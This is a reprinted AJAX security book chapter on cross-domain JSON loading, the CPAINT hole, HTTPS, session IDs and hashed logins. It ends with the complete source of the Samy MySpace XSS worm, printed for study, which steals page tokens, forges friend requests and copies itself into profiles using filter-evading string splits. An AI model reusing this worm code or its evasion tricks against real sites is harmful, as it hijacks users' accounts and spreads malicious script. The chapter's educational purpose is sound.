JSON - An Attempt to Bring XSS Back

This content is reprinted from Real-World AJAX: Secrets of the Masters, published by SYS-CON Books. Aimed at everyone from enterprise developers to self-taught scripters, the book is intended for anyone who wants to start developing AJAX applications.

JSON lets one take advantage of the "On Demand JavaScript/Script Tag hack" described earlier. With this technique, new HTML script tags are generated dynamically, and the "script" they reference can be downloaded from any server.

When the downloaded script is made up of data formatted in JSON, the script tag is effectively being used to download new data across domains outside of the same-origin policy.

But if you're going to employ JSON techniques this way to build an application, great care must be taken to close the security holes it opens. You are depending on every piece of JavaScript returned by third-party sources to cooperate with your application and your intentions. In other words, this technique opens your application to whatever JavaScript the servers you request from choose to supply. For this reason, it may be better suited to controlled environments than to the public Web.
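The difference between the two fetch paths, as an added example that is not code from the book: the script-tag path hands the whole response to the JavaScript engine (simulated here with new Function(), standing in for a browser evaluating a script element), while a same-origin XMLHttpRequest fetch hands the response to JSON.parse, which accepts data and rejects everything else. The callback name and the sample responses are constructed for the demonstration.

```javascript
// Added example, not code from the book: a script-tag (on-demand JavaScript) fetch of
// JSON next to an XMLHttpRequest fetch of the same text, simulated in Node without a DOM.

// Script-tag path: the whole response body is executed as JavaScript with the page's
// privileges, exactly as appending <script src="https://other-domain/..."> would do.
// new Function() stands in for the browser's script element here so the example runs offline.
function loadViaScriptTag(responseText, callback) {
  return new Function('callback', responseText)(callback);
}

// XMLHttpRequest path: the response is parsed as data. Anything that is not a JSON
// document is rejected by the parser instead of being run.
function loadViaXhr(responseText) {
  try {
    return { ok: true, data: JSON.parse(responseText) };
  } catch (err) {
    return { ok: false, error: err.name };
  }
}

// Constructed sample responses from a third-party server. The first is the cooperating
// case; the second carries the same data plus an extra statement that server chose to add.
const COOPERATING_RESPONSE = 'callback({"user":"alice","role":"member"})';
const EXTRA_STATEMENT_RESPONSE =
  'callback({"user":"alice","role":"member"}); globalThis.extraStatementRan = true;';
const PLAIN_JSON_RESPONSE = '{"user":"alice","role":"member"}';

// Runs both paths over the samples and reports what each one accepted or executed.
function demo() {
  const out = {};
  loadViaScriptTag(COOPERATING_RESPONSE, (data) => { out.scriptRole = data.role; });
  loadViaScriptTag(EXTRA_STATEMENT_RESPONSE, (data) => { out.scriptRoleExtra = data.role; });
  out.extraStatementRan = globalThis.extraStatementRan === true; // the added statement ran
  out.xhrAcceptsCallbackCall = loadViaXhr(COOPERATING_RESPONSE).ok;  // false: not JSON
  out.xhrAcceptsExtra = loadViaXhr(EXTRA_STATEMENT_RESPONSE).ok;     // false: not JSON
  out.xhrAcceptsPlainJson = loadViaXhr(PLAIN_JSON_RESPONSE).ok;      // true
  return out;
}
```

The same-origin policy is what forces the XMLHttpRequest path to talk only to your own server; the script-tag path escapes that policy, and with it the guarantee that the response is data rather than code.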

Other parts of this book will discuss JSON in detail. What's important to note here is that JSON is a good example of how developers will continue to build paths to external data even when some security may be built in to prohibit it.

When this happens, your own security efforts and your understanding of the risks become more important in the design and maintenance of your Web application.

The CPAINT Hole
CPAINT, the cross-platform Asynchronous Internet Toolkit, is a common set of tools used by many sites to implement AJAX. In October 2005, a hole was found in servers running CPAINT that allowed the execution of malicious code on a server using CPAINT.

When the hole was noticed, the CPAINT community rapidly identified a solution and released a patch to close it. Hence, CPAINT was more of a hole in a tool than a risk for AJAX, but the hole itself is an AJAX issue.

CPAINT examines requests to parse out malicious code. However, like Samy's MySpace worm code, malicious code could be introduced to the server by providing it in fragments the CPAINT parser would allow and concatenate into executable script.

CPAINT also included elements that allowed malicious code to fish for and execute server-side code.

In both of these instances, validating the request and properly screening for malicious code quickly sealed the security holes. More information: www.techworld.com/security/news/index.cfm?NewsID=4245

Good Old Network Security
General network security remains important in AJAX applications, since we've seen that the server-side risks can increase with AJAX. A few simple network security practices can go a long way toward increasing the security of your server.

Securing the conversation between the browser and the server is key to securing AJAX servers. As mentioned above, unverified XMLHttpRequests can steal information or release malicious code. Maintaining strict control over requests is therefore an important consideration in AJAX application design.

HTTPS
HTTPS is standard secure HTTP. HTTPS sessions typically use a different port than unsecured HTTP (HTTPS uses port 443, HTTP uses port 80). Transactions over HTTPS are encrypted via SSL. An encrypted connection over HTTPS can aid in securing session and request validation by hiding the contents of specific requests, including session identifiers, from eavesdroppers.

Typically, because HTTP is a stateless protocol, state is maintained between the browser and a server by passing a session ID back and forth. This ID can be stored in a cookie on the browser (whose cookie data is then sent back to the originating server), embedded in request URLs, or embedded in some part of the Web page that communicates with the server.

This last case is particularly viable with AJAX. For example, in response to an AJAX request, a server can include a short-lived session ID. The server can then validate subsequent requests from the browser based on that ID.

A malicious user or application could try to capture that ID and then reuse it to impersonate the user/application that initiated the session. To the degree that the browser prevents cross-site scripting attacks, this ID is safe in the browser context.

But, "on the wire," using HTTP, the value of this ID would be exposed as plain text. And, if the session ID persisted for a long time, there would be a bigger window of opportunity to hijack the session.

Fortunately, by encrypting the connection between the browser and server, HTTPS never exposes the request or response contents as plain text. So session IDs aren't exposed "on the wire."

Encryption

  • The Hash: Many secure transactions on the Web take place using a cryptographic tool called a hash. A hash is a value derived from other data that looks random but can be recomputed and verified. A server will supply a given session with a unique hash that can accompany the URI, track the session, and validate requests. The hash itself isn't used to log into a session, merely to track one. Therefore, if a hash is intercepted, it can't be used by an outside entity.
  • Direct Login: Another interesting security-related feature that makes use of AJAX is a technique known as "direct login." Direct login submits login information using an XMLHttpRequest rather than a single full-page post of an HTML form.
Direct login, in some sense, is actually less direct: several steps are involved that can provide added security. But, from the user's perspective, the login is "direct" because it occurs without reloading the page.

Because the direct login process uses JavaScript, it can take advantage of JavaScript's ability to calculate hashes and then transmit only hashed credentials, rather than plain text, to the server.

Direct login can work hand-in-hand with HTTPS. But sometimes HTTPS is unavailable or undesirable, due to the performance overhead associated with encrypting all of the browser-server conversation.

Figure 8.1 shows how direct login works. A user already has an account on the server. When the user approaches the site, the server creates a unique one-time session seed. The server provides the session seed to the browser, which asks the user for a user name and password/passphrase. The browser then hashes the entered password, producing the same hash it assumes the server has stored for that user ID, and hashes that result again together with the session seed (double hashing).

This creates a very secure hash to provide the server. The browser then feeds the server the double hash, the user name, and the session seed.

The server then takes the seed and user name and verifies them. It then looks up the stored hash for that user, combines it with the seed, and creates its own server-side double hash. That double hash is then compared to the one sent by the browser.

If they match, the user can access the system. If they don't, the server can generate a second seed and rechallenge the browser.

In this system, the actual user password is never transmitted. Only the double hash and the user ID are transmitted. Computation on both sides is necessary to create the unique session double hash.

  • Host-Proof Hosting: Host-proof hosting is still more of a theory than an actual technique. First raised by Richard Schwartz, host-proof hosting encrypts most information traveling through a server to protect both the host and the client from data theft or other intrusions.
Exploit with Care
Users don't know what you are doing to them. Your AJAX code may work miracles, but may leave their comfort zone, which the more savvy will immediately bring to your attention (and through their blogs, everyone else's).

AJAX applications by design shuffle data around. If you're gathering information about their visit or supplying data to them from a variety of sources - let the users know. You may feel your application is completely innocent, but others may feel differently.

Also, without that information, others may grow not to trust your application if they feel their information is in some way being used without their consent.

Last, as technologies come and go, good and bad exploits are going to come and go with them. Disclosure will keep you safe.

Conclusion: I Must Exploit: I Must Not Be Exploited
Exploits are what drive AJAX development. AJAX is all about pushing the browser to its limits. How close can it get to desktop app complexity? How much data can we combine and analyze on one elegant Web page? How many independent data requests can feed one session?

But even as we exploit, we don't want to be exploited. XSS, JSON, and other future flavors of AJAX all bring previously unseen power to browser-based apps. But they bring the danger of malicious scripting with them. Since AJAX is, and for its lifetime will be, a work-in-progress, google AJAX Security often.

Full Code Example: The Samy MySpace Virus
Examining the Samy virus shows that while it's technically easy to use some of these exploits, it's still a bit of work.

  // get quotes string
  var B=String.fromCharCode(34);
  var A=String.fromCharCode(39);

  function g()
  {
    var C;
    try
    {
      var D=document.body.createTextRange();
      C=D.htmlText
    }
    catch(e)
    {
    }
    if(C)
    {
      return C
    }
    else
    {
      return eval('document.body.inne'+'rHTML')
    }
  }

  function getData(AU)
  {
    M=getFromURL(AU,'friendID');
    L=getFromURL(AU,'Mytoken')
  }

  function getQueryParams()
  {
    var E=document.location.search;
    var F=E.substring(1,E.length).split('&');
    var AS=new Array();
    for(var O=0;O<F.length;O++)
    {
      var I=F[O].split('=');
      AS[I[0]]=I[1]
    }
    return AS
  }

  var J;
  var AS=getQueryParams();
  var L=AS['Mytoken'];
  var M=AS['friendID'];

  if(location.hostname=='profile.myspace.com')
  {
    document.location='http://www.myspace.com'+location.pathname+location.search
  }
  else
  {
    if(!M)
    {
      getData(g())
    }
    main()
  }

  function getClientFID()
  {
    return findIn(g(),'up_launchIC( '+A,A)
  }

  function nothing()
  {
  }

  function paramsToString(AV)
  {
    var N=new String();
    var O=0;
    for(var P in AV)
    {
      if(O>0)
      {
      N+='&'
      }
      var Q=escape(AV[P]);
      while(Q.indexOf('+')!=-1)
      {
        Q=Q.replace('+','%2B')
      }
      while(Q.indexOf('&')!=-1)
      {
        Q=Q.replace('&','%26')
      }

      N+=P+'='+Q;
      O++
    }
    return N
  }

  function httpSend(BH,BI,BJ,BK)
  {
    if(!J)
    {
      return false
    }
    eval('J.onr'+'eadystatechange=BI');
    J.open(BJ,BH,true);
    if(BJ=='POST')
    {
      J.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
      J.setRequestHeader('Content-Length',BK.length)
    }
     J.send(BK);
     return true
  }

  function findIn(BF,BB,BC)
  {
    var R=BF.indexOf(BB)+BB.length;
    var S=BF.substring(R,R+1024);
    return S.substring(0,S.indexOf(BC))
  }

  function getHiddenParameter(BF,BG)
  {
    return findIn(BF,'name='+B+BG+B+' value='+B,B)
  }

  function getFromURL(BF,BG)
  {
    var T;
    if(BG=='Mytoken')
    {
      T=B
    }
     else
    {
      T='&'
    }
    var U=BG+'=';
    var V=BF.indexOf(U)+U.length;
    var W=BF.substring(V,V+1024);
    var X=W.indexOf(T);
    var Y=W.substring(0,X);
    return Y
  }

  function getXMLObj()
  {
    var Z=false;
    if(window.XMLHttpRequest)
    {
      try
      {
        Z=new XMLHttpRequest()
      }
      catch(e)
      {
        Z=false
      }
    }
    else if(window.ActiveXObject)
    {
      try
      {
        Z=new ActiveXObject('Msxml2.XMLHTTP')
      }
      catch(e)
      {
        try
        {
          Z=new ActiveXObject('Microsoft.XMLHTTP')
        }
        catch(e)
        {
          Z=false
        }
      }
    }
    return Z
  }

  var AA=g();
  var AB=AA.indexOf('m'+'ycode');
  var AC=AA.substring(AB,AB+4096);
  var AD=AC.indexOf('D'+'IV');
  var AE=AC.substring(0,AD);
  var AF;

  if(AE)
  {
    AE=AE.replace('jav'+'a',A+'jav'+'a');
    AE=AE.replace('exp'+'r)','exp'+'r)'+A);
    AF=' but most of all, samy is my hero. '
  }

  var AG;

  function getHome()
  {
    if(J.readyState!=4)
    {
      return
    }

    var AU=J.responseText;
    AG=findIn(AU,'P'+'rofileHeroes','');
    AG=AG.substring(61,AG.length);
    if(AG.indexOf('samy')==-1)
    {
      if(AF)
      {
        AG+=AF;
        var AR=getFromURL(AU,'Mytoken');
        var AS=new Array();
        AS['interestLabel']='heroes';
        AS['submit']='Preview';
        AS['interest']=AG;
        J=getXMLObj();
        httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))
      }
    }
  }

  function postHero()
  {
    if(J.readyState!=4)
    {
      return
    }

    var AU=J.responseText;
    var AR=getFromURL(AU,'Mytoken');
    var AS=new Array();
    AS['interestLabel']='heroes';
    AS['submit']='Submit';
    AS['interest']=AG;
    AS['hash']=getHiddenParameter(AU,'hash');
    httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))
  }

  function main()
  {
    var AN=getClientFID();
    var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;
    J=getXMLObj();
    httpSend(BH,getHome,'GET');
    xmlhttp2=getXMLObj();
    httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')
  }

  function processxForm()
  {
    if(xmlhttp2.readyState!=4)
    {
      return
    }

    var AU=xmlhttp2.responseText;
    var AQ=getHiddenParameter(AU,'hashcode');
    var AR=getFromURL(AU,'Mytoken');
    var AS=new Array();
    AS['hashcode']=AQ;
    AS['friendID']='11851658';
    AS['submit']='Add to Friends';
    httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))
  }

  function httpSend2(BH,BI,BJ,BK)
  {
    if(!xmlhttp2)
    {
      return false
    }

    eval('xmlhttp2.onr'+'eadystatechange=BI');
    xmlhttp2.open(BJ,BH,true);

    if(BJ=='POST')
    {
      xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
      xmlhttp2.setRequestHeader('Content-Length',BK.length)
    }

    xmlhttp2.send(BK);
    return true
  }

More Stories By James Benson

Jim Benson, AICP, is the COO of Gray Hill Solutions in Seattle. Gray Hill creates tools for government and industry to harness and utilize real-time data. Jim has always driven applications for his clients to store and provide information in easily extensible ways. Web 2.0 has therefore been a natural environment for him. He is also involved with the Cooperation Commons and the Institute for the Future's Future Commons to study human cooperation and envision the future of cooperation. Jim's tags: Gray Hill Solutions (www.grayhillsolutions.com), Jim's Blog (http://ourfounder.typepad.com), Cooperation Commons (www.cooperationcommons.org), Institute for the Future (www.iftf.org).

More Stories By Jay Fienberg

Jay Fienberg is co-founder of Juxtaprose where he designs information architecture and user experience for websites and information systems.

He specializes in design for content and information-rich websites and web-based social and collaboration systems. His current preferred CMS is ExpressionEngine, though he also works with Wordpress and Joomla, and still gets called upon to make SharePoint do interesting CMS-like things for enterprise intranets.

Since the early 1990s, Jay also has designed and developed hypertext, database, and content management systems and worked in a wide range of programming languages including XML, SQL, SGML, Python, PHP, Javascript, Java, HTML, CSS and APL.

For anything more official, please visit jayfienberg.com.